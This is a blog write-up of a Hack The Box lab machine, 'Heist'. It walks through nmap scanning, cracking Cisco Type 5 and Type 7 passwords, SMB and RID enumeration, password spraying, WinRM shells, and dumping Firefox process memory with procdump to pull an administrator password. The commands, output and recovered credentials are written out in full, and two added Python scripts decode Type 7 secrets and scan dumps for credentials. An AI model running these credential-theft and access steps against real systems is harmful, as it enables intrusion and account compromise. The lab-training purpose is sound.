This blog is related to Computer Security and Ethical hacking and does not promote hacking, cracking, software piracy or any kind of illegal activities. The blog is for informational and educational purpose and for those willing to learn about ethical hacking and penetration testing.
You shall not misuse the information to gain unauthorized access. Performing hack attempts (without permission) on computers that you do not own is illegal.
Hello everyone!
Today we are going to go over the steps I followed to get root on Heist, a machine on Hack the Box. Hack The Box is an online platform allowing you to test and advance your skills in cyber security.
Scanning and Enumeration
I kicked off my analysis by conducting a comprehensive scan of the target system using nmap default scripts:
TGT=10.129.96.157
nmap -sSVC -n -oA nmap $TGT
Key findings:
Port 80: HTTP running Microsoft IIS 10.0.
Port 135: MSRPC.
Port 445: Microsoft SMB service.
Visiting the web server on port 80 revealed a "Support Login Page" with an option to log in as a guest:
Logging in provided access to download a Cisco configuration file containing encrypted passwords.
Extract of the config file:
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
Decrypting Passwords
The configuration file included three stored credentials:
Users rout3r and admin: Cisco Type 7 passwords (a reversible obfuscation, not real encryption).
enable secret: Cisco Type 5 hash (salted MD5, md5crypt).
Using an online Cisco Type 7 decoder for the Type 7 passwords, and hashcat (mode 500, md5crypt) with the rockyou wordlist for the enable secret, I recovered the credentials:
hashcat -a 0 -m 500 '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' rockyou.txt -O
rout3r: $uperP@ssword
Admin password: Q4)sJu\Y8qz*A3?d
Enable secret: stealth1agent
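The following Python script is an added example and not part of the original walkthrough. It is the kind of config auditor a network or security engineer would run over an exported Cisco config: it flags every stored secret by type, and for Type 7 it demonstrates why the "encryption" offers no protection by reversing the obfuscation with the publicly documented XOR key. The sample config is the extract from this post; the finding fields, severity labels and the audit_config/decode_type7 names are my own choices.

```python
import re

# Publicly documented Cisco Type 7 XOR key (the "xlat" table). Because the key
# is fixed and known, Type 7 is obfuscation, not encryption.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# Extract of the router config from the post, embedded here as sample input.
SAMPLE_CONFIG = """\
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""


def decode_type7(blob: str) -> str:
    """Reverse Cisco Type 7 obfuscation.

    Format: two decimal digits giving the starting offset into TYPE7_KEY,
    followed by hex byte pairs, each XORed with the next key byte.
    """
    if len(blob) < 4 or len(blob) % 2 != 0 or not blob[:2].isdigit():
        raise ValueError("not a well-formed Type 7 string")
    offset = int(blob[:2])
    data = bytes.fromhex(blob[2:])
    plain = bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)]
                  for i, b in enumerate(data))
    return plain.decode("ascii")


# Matches "username X [privilege N] password|secret TYPE VALUE" and
# "enable password|secret TYPE VALUE".
LINE_RE = re.compile(
    r"^(?P<prefix>(?:username \S+(?: privilege \d+)?|enable)) "
    r"(?P<kind>password|secret) (?P<type>\d) (?P<value>\S+)$"
)


def audit_config(text: str) -> list[dict]:
    """Return one finding per stored credential, ordered as in the config."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        m = LINE_RE.match(line)
        if not m:
            continue
        t = m["type"]
        entry = {"line": line, "type": t}
        if t == "7":
            entry["severity"] = "high"
            entry["reason"] = "Type 7 is reversible with a fixed public key"
            entry["recovered"] = decode_type7(m["value"])   # proof of reversibility
        elif t == "5":
            entry["severity"] = "medium"
            entry["reason"] = "Type 5 is salted MD5 (md5crypt, hashcat -m 500); crackable offline"
        elif t in ("8", "9"):
            entry["severity"] = "info"
            entry["reason"] = "Type 8 (PBKDF2-SHA256) / Type 9 (scrypt); acceptable"
        else:
            entry["severity"] = "unknown"
            entry["reason"] = f"unrecognised storage type {t}"
        findings.append(entry)
    return findings


if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f["severity"].upper(), f["reason"], "|", f["line"])
```

On this config the auditor returns one medium finding (the Type 5 enable secret) and two high findings (the Type 7 user passwords). The device-side fix is to store secrets with `secret 9` (scrypt) or at least `secret 8`, and to remember that `service password-encryption` only produces Type 7 and must not be treated as protection.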
SMB Enumeration
Armed with the credentials, I tested SMB access using netexec:
netexec smb $TGT -u hazard -p stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
I then did a little more enumeration with netexec and smbmap:
netexec smb $TGT -u hazard -p stealth1agent --shares
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK [*] Enumerated shares
SMB 10.129.96.157 445 SUPPORTDESK Share Permissions Remark
SMB 10.129.96.157 445 SUPPORTDESK ----- ----------- ------
SMB 10.129.96.157 445 SUPPORTDESK ADMIN$ Remote Admin
SMB 10.129.96.157 445 SUPPORTDESK C$ Default share
SMB 10.129.96.157 445 SUPPORTDESK IPC$ READ Remote IPC
smbmap -u hazard -p stealth1agent -d SupportDesk -H $TGT
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.129.96.157:445 Name: 10.129.96.157 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
I enumerated shares, noting that with hazard's credentials only IPC$ was readable, so there was no obvious file share to pivot through. A brute-force RID enumeration revealed several user accounts, including:
Administrator
Guest
Hazard
Chase
netexec smb $TGT -u hazard -p stealth1agent --rid-brute
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK 500: SUPPORTDESK\Administrator (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 501: SUPPORTDESK\Guest (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 513: SUPPORTDESK\None (SidTypeGroup)
SMB 10.129.96.157 445 SUPPORTDESK 1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1009: SUPPORTDESK\support (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1012: SUPPORTDESK\Chase (SidTypeUser)
SMB 10.129.96.157 445 SUPPORTDESK 1013: SUPPORTDESK\Jason (SidTypeUser)
I created a users.txt and a passwords.txt file and ran a password spray using netexec:
netexec smb $TGT -u users.txt -p passwords.txt --continue-on-success
And success! I found valid credentials for user Chase:
Username: Chase
Password: Q4)sJu\Y8qz*A3?d
With valid credentials, I confirmed remote access using netexec winrm:
netexec winrm $TGT -u Chase -p "Q4)sJu\Y8qz*A3?d" -X "ipconfig"
This granted me WinRM access, allowing me to execute commands on the target.
Exploitation
Using evil-winrm, I gained an interactive shell and extracted the user flag from the desktop:
evil-winrm -i $TGT -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'
Navigating through the user Desktop, I found and captured the flag. 🎉
Privilege Escalation
After capturing the user.txt flag and exploring the Desktop, I noticed that there was a todo.txt file:
PS C:\Users\Chase\Desktop>type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
After a quick run with winPEAS, I noticed that a Firefox credentials database file was accessible.
Downloading it took me a while because I kept getting a 0-byte file. It turned out that I had to kill the Firefox process before attempting the download; after that I was finally able to download it.
I started trying to crack it, but had a hard time finding the additional files required to decrypt the stored credentials.
It eventually turned out to be a 4-hour rabbit hole, as this wasn't the way to escalate privileges.
Well, back to square one. According to Chase's to-do list, he was supposed to keep checking the issues list. Looking at the running processes, the only thing that stood out was Firefox, and there's a good chance he is the one using it.
Disclaimer: At this point I had to look for a hint. Forensics isn’t my strongest suit, so I didn’t think about exploring the processes’ memory.
Once I realized this was a potential avenue and learned about ProcDump.exe I uploaded and used it to dump Firefox’s Memory:
*Evil-WinRM* PS C:\Users\Chase\Documents> get-process -name firefox
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
1063 63 112688 201964 2.52 6440 1 firefox
*Evil-WinRM* PS C:\Users\Chase\Documents> $command = "C:\Users\Chase\Documents\procdump.exe -accepteula"
*Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-Expression $command
*Evil-WinRM* PS C:\Users\Chase\Documents> $command = "C:\Users\Chase\Documents\procdump.exe -ma 6440 firefox.dmp"
*Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-Expression $command
I downloaded firefox.dmp to my attacker machine (after several tries, since the transfers kept timing out) for further investigation. The dump was almost 50 MB, and at this point I didn't know what I was looking for.
Going back to the /login.php page, I used Burp Proxy to inspect the HTTP request/response messages for a login attempt:
I noticed that the password was sent in a POST parameter named "login_password".
I then used strings (with -el, which extracts 16-bit little-endian, i.e. UTF-16LE, strings, the encoding Windows uses for most in-memory text) and grep to look for this parameter name in the dump:
strings -el firefox.dmp | grep login_password
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
These credentials, admin@support.htb and 4dD!5}x/re8]FBuZ, looked promising!
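The strings -el search works because Windows keeps most in-process text as UTF-16LE, which plain strings skips. As an added example (not code from the original walkthrough), here is a Python equivalent that an incident responder could run over a process dump to learn which credential-bearing URLs are exposed, so the right accounts get rotated, without printing the secret values themselves. The dump bytes, host names, parameter values, the SENSITIVE_PARAMS list and the function names are all constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample "dump": junk bytes around a UTF-16LE browser command line,
# modelled on what the post found with `strings -el`. All values are placeholders.
SAMPLE_DUMP = (
    b"\x00\x01\x02MZ\x90\x00noise\xff\xfe"
    + ('"C:\\Program Files\\Mozilla Firefox\\firefox.exe" '
       'localhost/login.php?login_username=user@example.test'
       '&login_password=PLACEHOLDER_PW&login=').encode("utf-16-le")
    + b"\x00\x00\x13\x37"
    + "https://intranet.example.test/home?tab=issues".encode("utf-16-le")
    + b"\xde\xad"
)

# Query-parameter names treated as credential-bearing (constructed list).
SENSITIVE_PARAMS = {"password", "passwd", "pwd", "token", "secret", "api_key"}

# Bare host/path?query or full http(s) URL, no whitespace inside.
URL_RE = re.compile(r"(?:https?://)?[\w.-]+(?::\d+)?/\S*\?\S+")


def utf16le_strings(data: bytes, min_len: int = 8) -> list[str]:
    """Equivalent of `strings -el`: runs of printable ASCII encoded as UTF-16LE."""
    # each character is a printable byte followed by a 0x00 byte
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(data)]


def find_exposed_credentials(data: bytes) -> list[dict]:
    """Report URLs in the dump whose query string carries a credential-like
    parameter. Only host and parameter names are returned, never the values."""
    hits = []
    for s in utf16le_strings(data):
        for url in URL_RE.findall(s):
            if not url.startswith("http"):
                url = "http://" + url          # give urlsplit a scheme to parse
            parts = urlsplit(url)
            params = parse_qsl(parts.query, keep_blank_values=True)
            leaked = [k for k, _ in params
                      if any(w in k.lower() for w in SENSITIVE_PARAMS)]
            if leaked:
                hits.append({"host": parts.hostname, "params": leaked})
    return hits


if __name__ == "__main__":
    for hit in find_exposed_credentials(SAMPLE_DUMP):
        print(f"credential-bearing URL for {hit['host']}: {', '.join(hit['params'])}")
```

Run over the sample it reports one exposure (localhost, login_password) and ignores the second URL, whose query carries nothing sensitive. The underlying defensive point is the same one the dump illustrates: a password placed in a URL query string survives in process memory, browser history and logs long after the request, so credentials belong in POST bodies and short-lived session tokens.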
Armed with the newly discovered credentials, I tested them for WinRM access as the Administrator:
netexec winrm $TGT -u Administrator -p '4dD!5}x/re8]FBuZ'
WINRM 10.129.96.157 5985 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
WINRM 10.129.96.157 5985 SUPPORTDESK [+] SupportDesk\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!)
And it worked! I then got a shell and the root flag with Evil-WinRM:
evil-winrm -i $TGT -u Administrator -p '4dD!5}x/re8]FBuZ'
Evil-WinRM PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
Lessons Learned
Read and analyze all clues carefully (e.g., todo.txt).
Use get-process to identify active processes for exploitation.
Memory dumps often reveal sensitive data (e.g., credentials).
Avoid rabbit holes (DAH!); reassess your strategy if you get stuck.
Evil-WinRM and Netexec are your friends.
Call to Action!
Thanks for making it this far! If you're enjoying these and haven't joined Hack The Box yet, I invite you to sign up using my referral link. Trust me, you'll get hooked! 😊 Until next time!